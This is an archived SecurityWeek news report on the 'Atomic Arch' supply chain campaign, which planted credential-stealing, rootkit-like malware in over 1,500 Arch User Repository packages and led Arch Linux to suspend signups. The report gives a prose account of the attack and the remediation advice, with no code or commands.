Security WeekArchived Jun 16, 2026✓ Full text saved
Arch Linux suspended account registrations in response to the wave of malicious packages being uploaded to AUR. The post Atomic Arch Supply Chain Attack Hits 1,500 AUR Packages appeared first on SecurityWeek .
Full text archived locally
✦ AI Summary· Claude Sonnet
Arch Linux on Monday announced that it has suspended new account registrations on the Arch User Repository (AUR) in response to a wave of malicious packages being published as part of an ongoing supply chain attack.
A community-driven repository, AUR enables Arch Linux users to share build scripts (PKGBUILDs) for software not in the official repositories, which can be cloned to build native packages locally.
The supply chain campaign, tracked by the cybersecurity community as Atomic Arch, started last week, with more than 1,500 malicious packages published by June 11.
“We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed,” Arch Linux said on Friday. On Monday, Arch Linux suspended AUR signups for cleanup purposes.
According to Sonatype, the campaign started with abandoned packages in AUR, which were modified to execute a malicious NPM package during installation. By June 12, the attackers switched to Bun-based installation paths and also started pushing new malicious packages.
By targeting orphaned packages that had a history of legitimate use, the attackers ensured the attack’s blast radius was large.
Similar to the modus operandi observed in the Axios supply chain attack, the hackers modified the packages’ PKGBUILD to introduce malicious behavior masquerading as the NPM package atomic-lockfile.
The Linux executable that runs during package installation as part of an Atomic Arch attack references eBPF (extended Berkeley Packet Filter), the technology that allows programs to run inside the Linux kernel with elevated privileges, likely for persistence purposes.
Sonatype also observed functionality related to process, file, and network hiding; Linux socket diagnostic interfaces; debugger detection; and HTTP upload functionality.
The rootkit-like malware also references credentials, SSH artifacts, HashiCorp Vault tokens, browser cookies, and data stores from popular collaboration applications, suggesting it was designed for credential and secret harvesting and exfiltration.
“On systems where it runs with elevated privileges, the malware can also attempt eBPF-based persistence to hide processes and file activity, making detection and cleanup significantly harder. A compromised host should be treated as fully untrusted: rebuild from clean media and rotate all exposed credentials. A one-off malware scan is not sufficient,” StepSecurity notes.
Related: NPM 12 Will Change Script Execution Behavior to Prevent Supply Chain Attacks
Related: Over 100 NPM, PyPI Packages Hit in New Shai-Hulud Supply Chain Attacks
Related: Supply Chain Attack Hits 32 Red Hat NPM Packages
Related: Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack
WRITTEN BY
Ionut Arghire
Ionut Arghire is an international correspondent for SecurityWeek.
More from Ionut Arghire
Ukrainian Man Pleads Guilty in US to Conti Ransomware Charges
ShinyHunters Claims Council of Europe Hack
FBI, Google Dismantle ‘Outsider Enterprise’ Phishing Service
NPM 12 Will Change Script Execution Behavior to Prevent Supply Chain Attacks
Iranian Cyber Group Handala Claims Cal Water Hack
Ivanti Sentry Exploitation Attempts Hitting Honeypots
Chrome 149 Update Patches 28 Vulnerabilities
CISA Directs Federal Agencies to Prioritize Security Patches Based on Risk
Latest News
Cal Water Investigating Iranian Hackers’ Claims
White House Issues Memo to Bolster NSS Cybersecurity
Cybersecurity Executives Urge the Trump Administration to Ease Restrictions on Anthropic AI Models
Tech Coalition ‘Athena’ Targets OSS Vulnerabilities Ahead of Disclosure
Cisco Patches Another SD-WAN Zero-Day Exploited in Attacks
Ransomware Attack Shuts Down Mills of Australia’s Second-Largest Sugar Producer
Chinese Hackers Target Medical, Military, and AI Research in North America
NewCore Emerges From Stealth Mode With $66 Million in Funding
Trending
Webinar: How Modern Breaches Bypass MFA And Evade Detection
June 17, 2026
Today’s attackers are no longer breaking in — they’re logging in. Join this live webinar as we break down the modern identity attack chain and examine how recent breaches exploited weaknesses in authentication, identity verification, and access management processes.
Register
Webinar: Modern Exposure Validation In The AI Era
June 24, 2026
AI has accelerated both sides of the fight. Adversaries are weaponizing vulnerabilities faster, while defenders are racing to ship detections and configurations. Join this live webinar as we explore how to prove your controls actually hold against new threats, map your security maturity, and unite breach simulation with automated pentesting into a single, coordinated program.
Register
People on the Move
Stephen Garcia has been named Chief Information Security Officer at BreachRx.
Kasper Lindgaard has been appointed Vice President of Security Strategy at CoreView.
Chaim Mazal has been named Chief Information Security Officer at GitLab.
More People On The Move
Expert Insights
After AI Reaches Production: 12 Ways Security Teams Can Take Control
Security teams need more than visibility into AI applications, they need a repeatable framework for monitoring, investigating, and defending them in production. (Joshua Goldfarb)
Everybody Is Vibe Coding But Nobody Told The Security Team
AI-driven development is not something organizations can or should block. But it must be governed. (Danelle Au)
The Zero-Knowledge Threat Actor And The End Of Responsible Disclosure
AI can help attackers generate malware, create malicious payloads, bypass simple security checks, and convert vague malicious intent into functional code. (Etay Maor)
Raising The Cybersecurity Stakes: Ante Up For The Agentic Era
CISOs are now facing machine-speed attacks and asking, “How do I agent?” The industry must provide remediation at scale. (Nadir Izrael)
Caught Off Guard: Securing AI After It Hits Production
As enterprises rush AI projects into production, security teams are increasingly being forced into reactive mode. (Joshua Goldfarb)
Flipboard
Reddit
Whatsapp
Email